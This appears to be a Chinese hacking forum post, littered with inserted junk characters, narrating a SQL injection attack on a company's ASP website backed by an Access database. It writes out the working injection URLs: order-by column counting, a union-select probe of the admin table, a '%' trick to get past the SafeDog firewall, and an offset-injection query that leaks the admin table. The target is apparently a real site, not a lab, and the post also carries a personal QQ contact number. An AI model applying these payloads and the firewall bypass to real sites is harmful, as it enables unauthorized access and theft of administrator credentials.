打开网站,一个企业站。
( G' J% [1 X( H9 s$ u* g8 h6 G2 e9 E. ^) X5 z( S* p% s; @
/ r {2 d) u+ u6 f( E
顺手加个admin
6 ] N. e {# Y3 W. ]9 l" o! e& k
0 F( x* p! }* A% M5 i% S7 ]7 {6 i; L0 a7 G7 w z. S2 J7 L
默认后台。, D( W4 `8 C* N' Z, X, o) U2 Q
回到首页点开个产点连接在参数后面加上:and 1=1,发现有狗。/ s; p7 @+ z! g& W4 e& U3 b
( j, D# y" F3 J+ i |
8 ?- ~: X+ |, u: W* Q) [# {) F& i' o) \/ Z, L$ b x' s7 u
所以就不用御剑扫了,待会直接封IP。
) t- \" J* @9 G0 K% O2 _' v 4 T, e4 M4 S9 N
用order by语句判断是否存在注入。( S. P: h* K6 e- g5 v
http://www.xxx.com /product_show.asp?id=997 order by 1
6 v3 A* M$ G2 y% n7 R# x) s1 M* Ihttp://www.xxx.com /product_show.asp?id=997 order by 100
! x) I u4 Q3 D1 M现在存在注入,经测试后发现是9个字段。
/ t: v) X0 ^5 k5 Z- v; N# s' f I4 A
$ D( ^0 N0 l' I接下来进行联合查询,猜是否存在admin表。
+ B. _# H& |- \ Q! o9 Fhttp://www.xxx.com /product_show.asp?id=997+union+select+1,2,3,4,5,6,7,8+from+admin 被狗拦截。! ^7 b- A' ]; t' n' Z$ G
& m. B: L( ^0 |4 p! f
, k' B4 v- m4 Z ]5 | ?
; H% c+ z1 i* e6 N) R在select中间加个%,se%lect绕过安全狗。
1 ~) H+ H6 U. X3 o/ m5 ^) z7 Y: y5 Q( U W' S! | u3 p- ]" `8 |# W0 c3 k6 u
! S! {2 U1 ]" g8 H/ y+ {' g发现存在admin表,然后开始手工猜常用的字段。
0 U+ X% O+ c7 k7 f( D纠结的是手工把常用的字段都猜遍了,也没猜到一个字段。陷入迷茫中。* Z9 b- N: ~. Y
1 N* y" v/ H5 M* A& x突然想起之前看到的一篇关于access偏移注入的文章,文章就是说在注入猜不到字段时可以尝试一下这个方法,之前我特地去测试过这种方法,但是爆不出来,也没太在意。现在也只能试一下这种方法,拼一下人品了。" f p) `+ y. A! J L4 [9 _
2 {; _7 s6 ~7 g& k6 k( Y科普知识就不讲了,如果有不懂的可以加我Q:519582321 一起交流,有深圳的基友也可以加一起搞基情。
$ v% |& M( k! e7 Thttp://www.xxx.com /product_show.asp?id=997+union+s%elect+1,2,3,4,5,* from+admin# b' W2 a/ B8 y r' [' C7 ?% [4 I
好了,敏感内容出显了。
- g5 ?4 W- V8 `2 P( b' N9 B/ U' J( ]& \4 F
' J' \7 c" K0 q
7 U; M5 O1 @* t5 }9 D! ` |